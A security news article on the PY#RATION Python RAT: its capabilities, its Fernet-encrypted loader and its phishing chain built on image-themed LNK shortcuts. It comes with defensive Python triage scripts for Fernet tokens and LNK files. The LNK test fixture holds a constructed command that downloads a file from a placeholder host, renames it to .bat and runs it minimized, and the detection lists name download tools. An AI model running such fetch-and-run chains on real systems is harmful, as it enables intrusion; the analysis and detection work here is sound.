Researchers have disclosed a new attack campaign that uses a Python-based RAT dubbed PY#RATION. The attackers have been leveraging the RAT since August 2022 to gain control over compromised systems.
According to Securonix, the RAT has several capabilities that allow the harvesting of sensitive information.
PY#RATION can transfer files from the infected host machine to its C2 servers or vice versa.
It uses WebSockets both for C2 communication and data exfiltration and as a way to avoid detection, since the traffic blends in with ordinary web sessions.
It further captures clipboard data, records keystrokes, checks for the presence of antivirus software, and executes system commands. Moreover, the RAT extracts passwords and cookies from web browsers.
PY#RATION also functions as a pathway for deploying more malware, which in this campaign included a Python-based info-stealer built to steal data from cryptocurrency wallets and web browsers.
Two versions of the RAT (1.0 and 1.6) have been detected, with the latter adding further detection-evasion techniques.
In the later version, nearly 1,000 lines of code have been added to support network scanning, which lets the malware perform reconnaissance of the compromised network.
Further, in this version the attackers hide the Python code behind an encryption layer built on Fernet (the symmetric-encryption recipe from the Python cryptography package). Because the loader must carry the decryption key to run at all, this layer defeats static string matching rather than analysis: once the key and token are located, the next stage can be recovered offline.
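To show what that Fernet layer looks like from the analyst's side, here is an added triage script written for this article (it is not code from the campaign, from Securonix, or from the cryptography package) that uses only the Python standard library. It finds base64url blobs in a loader script, parses the Fernet token framing, confirms which 44-character key signed which token by recomputing the HMAC-SHA256 (Fernet signs with the first 16 bytes of the decoded key), and reports the timestamp Fernet embeds at encryption time. The loader text, key, and ciphertext bytes are constructed stand-ins; the "ciphertext" is filler, so nothing is decrypted here.

```python
import base64
import hashlib
import hmac
import re
import struct
from datetime import datetime, timezone

FERNET_VERSION = 0x80
# Runs of base64url characters long enough to be a 44-char Fernet key or a token.
B64URL_RE = re.compile(rb"[A-Za-z0-9_-]{40,}={0,2}")


def parse_token(token_b64: bytes):
    """Split a Fernet token into its fields; no key is needed for this step.

    Layout: 0x80 | 8-byte big-endian timestamp | 16-byte IV |
            AES-128-CBC ciphertext (multiple of 16) | 32-byte HMAC-SHA256.
    Returns None if the blob is not shaped like a token."""
    try:
        raw = base64.urlsafe_b64decode(token_b64)
    except (ValueError, TypeError):
        return None
    if len(raw) < 1 + 8 + 16 + 16 + 32 or raw[0] != FERNET_VERSION:
        return None
    ciphertext = raw[25:-32]
    if len(ciphertext) % 16:
        return None
    ts = struct.unpack(">Q", raw[1:9])[0]
    try:
        when = datetime.fromtimestamp(ts, tz=timezone.utc)
    except (OverflowError, OSError, ValueError):
        return None
    return {"ts": ts, "when": when, "iv": raw[9:25],
            "ciphertext_len": len(ciphertext), "signed": raw[:-32], "mac": raw[-32:]}


def key_matches(key_b64: bytes, parsed: dict) -> bool:
    """Recompute the token MAC with the candidate key's signing half (first 16 bytes)."""
    try:
        key = base64.urlsafe_b64decode(key_b64)
    except (ValueError, TypeError):
        return False
    if len(key) != 32:
        return False
    expected = hmac.new(key[:16], parsed["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, parsed["mac"])


def triage(script: bytes) -> list:
    """Return every (key, token) pair in the script whose HMAC verifies."""
    blobs = B64URL_RE.findall(script)
    keys = [b for b in blobs if len(b) == 44]   # a Fernet key is always 44 chars
    hits = []
    for blob in blobs:
        parsed = parse_token(blob)
        if parsed is None:
            continue
        for key in keys:
            if key_matches(key, parsed):
                hits.append({"key": key, "ts": parsed["ts"],
                             "when": parsed["when"].isoformat(),
                             "ciphertext_len": parsed["ciphertext_len"]})
    return hits


def build_sample_token(key_b64: bytes, filler_ciphertext: bytes, ts: int) -> bytes:
    """Frame filler bytes as a Fernet token (constructed test data, not real AES output)."""
    key = base64.urlsafe_b64decode(key_b64)
    body = bytes([FERNET_VERSION]) + struct.pack(">Q", ts) + b"\x11" * 16 + filler_ciphertext
    mac = hmac.new(key[:16], body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + mac)


SAMPLE_KEY = base64.urlsafe_b64encode(bytes(range(32)))   # constructed, not a real key
SAMPLE_TOKEN = build_sample_token(SAMPLE_KEY, b"\xaa" * 48, 1660000000)
# Constructed loader text with the decrypt-then-exec shape; not the campaign's code.
SAMPLE_LOADER = (
    b"from cryptography.fernet import Fernet\n"
    b"k = b'" + SAMPLE_KEY + b"'\n"
    b"blob = b'" + SAMPLE_TOKEN + b"'\n"
    b"exec(Fernet(k).decrypt(blob))\n"
)

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOADER):
        print(hit)
```

Once the key/token pairing is confirmed, the real decryption is `Fernet(key).decrypt(token)` from the cryptography package, the same call the loader itself makes; replacing the trailing `exec(...)` with a write to disk yields the next stage for static review. The embedded timestamp is set by Fernet when `encrypt()` runs, so it usually dates the packaging of that stage, though an attacker who patches the library can write anything there.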
The attack starts with a phishing email carrying a ZIP archive that contains two shortcut (.LNK) files. The files masquerade as the front and back images of a U.K. driver's license so that they appear legitimate. The nature of the lures suggests the intended targets are in the U.K. or North America.
Opening each LNK file fetches two text files from a remote server, which are then renamed to BAT files and run quietly in the background while a decoy image is shown to the victim.
One of these batch scripts downloads a further batch script from a C2 server, which in turn obtains additional payloads from the server, such as the Python binary (CortanaAssistance[.]exe).
The filename references Cortana, the Windows virtual assistant, in an attempt to pass the malware off as a legitimate system component.
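For the LNK stage, the practical detection question is what a shortcut actually launches when the user believes they are opening an image. Below is an added example written for this article (not Securonix's tooling and nothing from the campaign): a minimal Shell Link (MS-SHLLINK) parser in standard-library Python that reads the header flags, skips the LinkTargetIDList and LinkInfo blocks, pulls the StringData fields (relative path, arguments, icon location) and the ShowCommand, then applies heuristics matching the chain described above: a shell or script host as the target, a download in the arguments, a rename to .bat, an image-looking icon, and a minimized window. The sample shortcut is constructed inside the block; its URL and filenames are placeholders, not the campaign's indicators.

```python
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
SW_SHOWMINNOACTIVE = 7
SHELL_HOSTS = ("cmd.exe", "powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32")
DOWNLOAD_HINTS = ("http://", "https://", "curl ", "certutil", "bitsadmin", "wget ",
                  "downloadstring", "invoke-webrequest", "iwr ")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def parse_lnk(data: bytes) -> dict:
    """Parse the parts of a Shell Link file that matter for triage."""
    header_ok = (len(data) >= LNK_HEADER_SIZE
                 and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
                 and data[4:20] == LNK_CLSID)
    if not header_ok:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = LNK_HEADER_SIZE
    try:
        if flags & HAS_ID_LIST:          # uint16 size followed by the item list
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINK_INFO:        # uint32 size that includes itself
            pos += struct.unpack_from("<I", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        for bit, name in STRING_FIELDS:  # uint16 char count, then chars, no terminator
            if not flags & bit:
                continue
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            chunk = data[pos:pos + count * width]
            if len(chunk) != count * width:
                raise ValueError("truncated StringData")
            pos += count * width
            fields[name] = chunk.decode("utf-16-le" if width == 2 else "cp1252")
    except struct.error as exc:
        raise ValueError("truncated Shell Link") from exc
    return fields


def lnk_findings(fields: dict) -> list:
    """Heuristics for an image-themed shortcut that really starts a script chain."""
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    icon = fields.get("icon_location", "").lower()
    findings = []
    if any(host in target or host in args for host in SHELL_HOSTS):
        findings.append("target is a shell or script host")
    if any(hint in args for hint in DOWNLOAD_HINTS):
        findings.append("arguments fetch content from a URL")
    if ".bat" in args and (" ren " in args or "rename " in args or "copy " in args):
        findings.append("arguments rename or copy a file to .bat before running it")
    if icon.endswith(IMAGE_EXTS):
        findings.append("icon points at an image file (masquerade)")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = 1) -> bytes:
    """Build a minimal Unicode Shell Link (constructed test data; no ID list or LinkInfo)."""
    flags = 0x08 | 0x20 | 0x40 | IS_UNICODE
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<IIQQQIiIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0))

    def field(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + field(relative_path) + field(arguments) + field(icon_location)


# Constructed sample modelled on the chain above; the URL and names are placeholders.
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
    arguments="/c curl -s -o %TEMP%\\a.txt http://example.invalid/a.txt && "
              "ren %TEMP%\\a.txt a.bat && start /min %TEMP%\\a.bat",
    icon_location="C:\\Users\\Public\\licence_front.jpg",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk("..\\..\\Program Files\\Notepad++\\notepad++.exe", "", "")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, lnk_findings(parse_lnk(blob)))
```

Real shortcuts nearly always carry a LinkTargetIDList and a LinkInfo block, and a shortcut may name its target only through the ID list rather than the RelativePath string; this parser skips those blocks, so treat an empty `relative_path` as unknown rather than benign and extend the parser with PIDL decoding before relying on it in a pipeline.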
Because PY#RATION is written in Python, it can run on macOS, Linux, and Windows. Combined with evasion tactics such as Fernet encryption, this makes it a versatile cross-platform threat. To protect against such threats, it is suggested to deploy an application whitelisting policy that stops the execution of unknown binaries, which would block a dropped executable such as CortanaAssistance[.]exe regardless of how it is named.